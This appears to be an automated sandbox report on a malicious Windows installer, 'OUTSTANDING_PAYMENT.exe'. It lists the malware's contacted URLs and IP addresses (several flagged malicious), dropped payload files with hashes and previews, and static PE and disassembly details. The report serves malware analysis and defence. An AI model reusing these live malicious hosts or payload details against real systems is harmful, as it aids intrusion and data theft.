                                                                                              http://www.allison2patrick.onlineexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.brennmansoluciones.com/0oqq/poIb=tYchV8explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.glb-mobility.com/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.brennmansoluciones.com/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://search.yahoo.com?fr=crmas_sfpfrundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                		high
                                                                                                https://www.fasthosts.co.uk/domain-names/search/?domain=$rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.themssterofssuepnse.rest/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                http://www.leewanyam.com/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://fasthosts.co.uk/rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.ketoibabal.cyouexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.nic.ru/catalog/hosting/shared/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.mynichemarket.co.uk/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://www.nic.ru/catarundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.ketoibabal.cyou/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.nic.ru/catalog/hosting/shared/?ipartner=6666&adv_id=click_vh&utm_source=stpg_all&utm_medrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.landlotto.ruexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icorundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                        		high
                                                                                                        https://www.nic.ru?ipartner=6666&adv_id=logo&utm_source=stpg_all&utm_medium=link&utm_campaign=logorundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.virginhairweave.co.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.litespeedtech.com/error-pagerundll32.exe, 0000000D.00000002.781120791.000000000595E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchrundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                              		high
                                                                                                              https://www.nic.ru/catalog/hosting/cms/?ipartner=6666&adv_id=click_cmsh&utm_source=stpg_all&utm_medirundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://ac.ecosia.org/autocomplete?q=81EFaKSJ3.13.drfalse
                                                                                                                  		high
                                                                                                                  https://search.yahoo.com?fr=crmas_sfprundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                                    		high
                                                                                                                    https://www.nic.ru/catalog/hosting/vds-vps/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.g2fm.co.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      109.70.26.37
                                                                                                                      		www.landlotto.ruRussian Federation
                                                                                                                      		48287RU-CENTERRUtrue
                                                                                                                      88.99.217.197
                                                                                                                      		glb-mobility.comGermany
                                                                                                                      		24940HETZNER-ASDEtrue
                                                                                                                      217.160.0.249
                                                                                                                      		www.karlscurry.co.ukGermany
                                                                                                                      		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                      162.209.159.142
                                                                                                                      		www.ty23vip.comUnited States
                                                                                                                      		40065CNSERVERSUStrue
                                                                                                                      192.64.116.162
                                                                                                                      		www.gorwly.topUnited States
                                                                                                                      		22612NAMECHEAP-NETUStrue
                                                                                                                      199.59.243.223
                                                                                                                      		www.hudsonandbailey.ukUnited States
                                                                                                                      		395082BODIS-NJUStrue
                                                                                                                      5.181.216.141
                                                                                                                      		dirdikyepedia.comGermany
                                                                                                                      		59637ASRSINETRUtrue
                                                                                                                      62.4.21.190
                                                                                                                      		allison2patrick.onlineFrance
                                                                                                                      		12876OnlineSASFRtrue
                                                                                                                      185.151.30.181
                                                                                                                      		www.mynichemarket.co.ukUnited Kingdom
                                                                                                                      		48254TWENTYIGBtrue
                                                                                                                      203.245.24.47
                                                                                                                      		fanversewallet.comKorea Republic of
                                                                                                                      		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                                                      198.58.118.167
                                                                                                                      		www.virginhairweave.co.ukUnited States
                                                                                                                      		63949LINODE-APLinodeLLCUStrue
                                                                                                                      213.171.195.105
                                                                                                                      		www.g2fm.co.ukUnited Kingdom
                                                                                                                      		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                                                                      General Information

                                                                                                                      Joe Sandbox Version:37.0.0 Beryl
                                                                                                                      Analysis ID:830322
                                                                                                                      Start date and time:2023-03-20 09:06:45 +01:00
                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                      Overall analysis duration:0h 13m 10s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:light
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                      Number of analysed new started processes analysed:18
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:1
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • HDC enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample file name:OUTSTANDING_PAYMENT.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/5@26/12
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HDC Information:
                                                                                                                      • Successful, ratio: 33.6% (good quality ratio 32.5%)
                                                                                                                      • Quality average: 81%
                                                                                                                      • Quality standard deviation: 24.3%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 0
                                                                                                                      • Number of non-executed functions: 0
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240s for rundll32

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                      • HTTP Packets have been reduced
                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      09:07:58API Interceptor1873x Sleep call for process: explorer.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      No context

                                                                                                                      Domains

                                                                                                                      No context

                                                                                                                      ASNs

                                                                                                                      No context

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Temp\81EFaKSJ3

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):94208
                                                                                                                      Entropy (8bit):1.2882898331044472
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                      MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                      SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                      SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                      SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6222
                                                                                                                      Entropy (8bit):7.133693106224874
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:Farc6oYwg/DrYu8k2XO5oSwQCahg5GwYTfOdaFxrsyGIi1GReZw7zmzuZP0ed:FarcRYkhX1S1CapwYmaFmyGIDCzzSL
                                                                                                                      MD5:933BE16F654BB3BC251347110454FB49
                                                                                                                      SHA1:A4580CC4A1D3AC955D648A9C34BBD27B5C48F9AE
                                                                                                                      SHA-256:5252B99D4CEB221CF6F0440F0F2430F7A76D1B6EAC6AB2997FB21828400B502E
                                                                                                                      SHA-512:845B3DA4F3AA844508AC7B0CE86253A2E588C994308D29EFB5385034CF38C413258820CB0C7C938F04E7B447549FE24076CD1EA327957AD70D200748BAAC942B
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                                                                                      C:\Users\user\AppData\Local\Temp\nsmF14F.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):288752
                                                                                                                      Entropy (8bit):7.703024922742189
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:7iDso57TQE/u3+8fgnGdzNrja8LI57EUHyTZ5CslO2br0xp1I:7iDsO7Myi+3nGdRa8Lyw57lO2brm
                                                                                                                      MD5:B770DC09825AC013742565DF7C5B0DF5
                                                                                                                      SHA1:8B0F5C52ABE0EB2310371254F051F63DD2841AF6
                                                                                                                      SHA-256:4A205CB23069324967DFE9615F25B7D8118D779979BFE22A8E366B02180AB140
                                                                                                                      SHA-512:87B160CBAFC2D042000A201802FAF88F5674C498624A9802D98BC0AF6B4386E8A54110ABB1CA769654259091C35511898A50CC82E759B02EEF32CB4D20BDA22A
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.-......,...................s...p........,.......-..............................................................................*...........................................................................................................................................................G...............%...j...........................................................................................................................................C...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\qhcqh.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):59904
                                                                                                                      Entropy (8bit):6.225922782264242
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Rpbnyq696YM4+FJV/dRuDh96ir6VhAkAXuabEoK3r412IGXM5x8dsr:RpbRrYSJV/ToZr6VhhAXj7GnI15is
                                                                                                                      MD5:41C9E29A7ED3640682A0003BE2DF4D93
                                                                                                                      SHA1:E22976256F765E9B526728A2890D2A59FD535636
                                                                                                                      SHA-256:FE949C62767413F53307655AE55EFAD92454EAF28DC874F4650DDD74C79A7050
                                                                                                                      SHA-512:FC22103EB32998D76A3207EA789011E7633E3B7838DAD274C41930908E19F74905C101D9FABA58A3B8295248A94F38EF4932248DFCFD84D2A24D160335E8C48A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                      Reputation:low
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................1... ...6..............<...$...Rich...................PE..L...?..d.....................`....................@..........................0............@.................................d................................ .......................................................................................text............................... ..`.rdata...!......."..................@..@.data....,..........................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\tmjcdbgtyam.ggz

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):210904
                                                                                                                      Entropy (8bit):7.998936663875696
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:6144:OiDso57TQE/u3+8fgnGdzNrja8LI57EUHyTZ5CslO2l:OiDsO7Myi+3nGdRa8Lyw57lO2l
                                                                                                                      MD5:9E7E609FCC35E2BF40522D621CB62D4F
                                                                                                                      SHA1:17E126ADA88229FE6C42E2DAFEE0080C6643F345
                                                                                                                      SHA-256:0DD2596D144CACBA46ECD058E5CE2F13D27414313D8D33DADBDC455F3358B09A
                                                                                                                      SHA-512:68BEB80FE38D860FAAB5F40398B0EFC91A60A33946AE5D9A259007B35FF0F87D7C6DBD7EED662F0B21954F7656F1860D0029EE828A2EC8D062DF5D896F84BB42
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:....._0.a.!..@...7.?\n...8I~JK.O.|...@.W.>..=..{..*X......J..AWE...N>..J..6.Z..l..]S=7....k!.n...K..Z...1'.z 4h.....Y.........>bt@iReh.u..c..k.QY...}...9....>..62I.K.../b.....M..s.K9.......Il5k.g..J_......Y..o._\......[.....l.+.8....{..g..V..J...._0....t.k.4.~......$>=<.r.O..=.@..>E.=..{./*X......J...(.....h.....`B\.e....1.zN..J....mrX......G....&x..v.FC.............o...?/.#..x..{.3h.-.!.....5...=t"....r...b.....M..+(t.K9..Z..O.ml/}r..J_......&:/.U..f......[.,.....+.......{.mg..Q......_0.a..t.k.4...)...$>=D.K.O.|...@.W.>..=..{..*X......J...(.....h.....`B\.e....1.zN..J....mrX......G....&x..v.FC.............o...?/.#..x..{.3h.-.!.....5...=t"....r...b.....M..s.K9.N...O+ml/.....J_......&:/.o..\......[.,.....+.......{.mg..Q......_0.a..t.k.4...)...$>=D.K.O.|...@.W.>..=..{..*X......J...(.....h.....`B\.e....1.zN..J....mrX......G....&x..v.FC.............o...?/.#..x..{.3h.-.!.....5...=t"....r...b.....M..s.K9.N...O+ml/.....J_......&:/.o..\......[

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                      Entropy (8bit):7.886295753349112
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:OUTSTANDING_PAYMENT.exe
                                                                                                                      File size:297210
                                                                                                                      MD5:4832e17c1f6841aee2e1984a429ed946
                                                                                                                      SHA1:d7ad36c7bee5cb39aa5b77944ced8a716a8af545
                                                                                                                      SHA256:d0ac15eeb53f64ad6f399ead8724f38344daf243332f03790598c6716a04f162
                                                                                                                      SHA512:f7dbb5749ad23b13d001c55be2ba6e4b8deab56d0687804c8a61bddb98b723bd1a244c32507bb16b9544e092d7bf5a37480d6ff34944752dfe464d30ada7244e
                                                                                                                      SSDEEP:6144:qYa6cFVIKVgBgM6rpFh/U8KAg9gxt03ZaHJ1XoF5KOJeeqN3rj:qYa3fWg3TK8KRg4pCUGj
                                                                                                                      TLSH:615402D19350D1E6E8A706F00C35EA2712BF7E3D54705E4A3B9E71A97E73192822EE03
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                                                                                      File Icon

                                                                                                                      Icon Hash:517959587979b110

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x403640
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:61259b55b8912888e90f516ca08dc514

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 000003F4h
                                                                                                                      push ebx
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      push 00000020h
                                                                                                                      pop edi
                                                                                                                      xor ebx, ebx
                                                                                                                      push 00008001h
                                                                                                                      mov dword ptr [ebp-14h], ebx
                                                                                                                      mov dword ptr [ebp-04h], 0040A230h
                                                                                                                      mov dword ptr [ebp-10h], ebx
                                                                                                                      call dword ptr [004080C8h]
                                                                                                                      mov esi, dword ptr [004080CCh]
                                                                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                                                                      push eax
                                                                                                                      mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                      mov dword ptr [ebp-2Ch], ebx
                                                                                                                      mov dword ptr [ebp-28h], ebx
                                                                                                                      mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                      call esi
                                                                                                                      test eax, eax
                                                                                                                      jne 00007FB070C04CCAh
                                                                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                                                                      mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                      push eax
                                                                                                                      call esi
                                                                                                                      mov ax, word ptr [ebp-0000012Ch]
                                                                                                                      mov ecx, dword ptr [ebp-00000112h]
                                                                                                                      sub ax, 00000053h
                                                                                                                      add ecx, FFFFFFD0h
                                                                                                                      neg ax
                                                                                                                      sbb eax, eax
                                                                                                                      mov byte ptr [ebp-26h], 00000004h
                                                                                                                      not eax
                                                                                                                      and eax, ecx
                                                                                                                      mov word ptr [ebp-2Ch], ax
                                                                                                                      cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                      jnc 00007FB070C04C9Ah
                                                                                                                      and word ptr [ebp-00000132h], 0000h
                                                                                                                      mov eax, dword ptr [ebp-00000134h]
                                                                                                                      movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                      mov dword ptr [0042A318h], eax
                                                                                                                      xor eax, eax
                                                                                                                      mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                      movzx eax, ax
                                                                                                                      or eax, ecx
                                                                                                                      xor ecx, ecx
                                                                                                                      mov ch, byte ptr [ebp-2Ch]
                                                                                                                      movzx ecx, cx
                                                                                                                      shl eax, 10h
                                                                                                                      or eax, ecx

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x4510.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
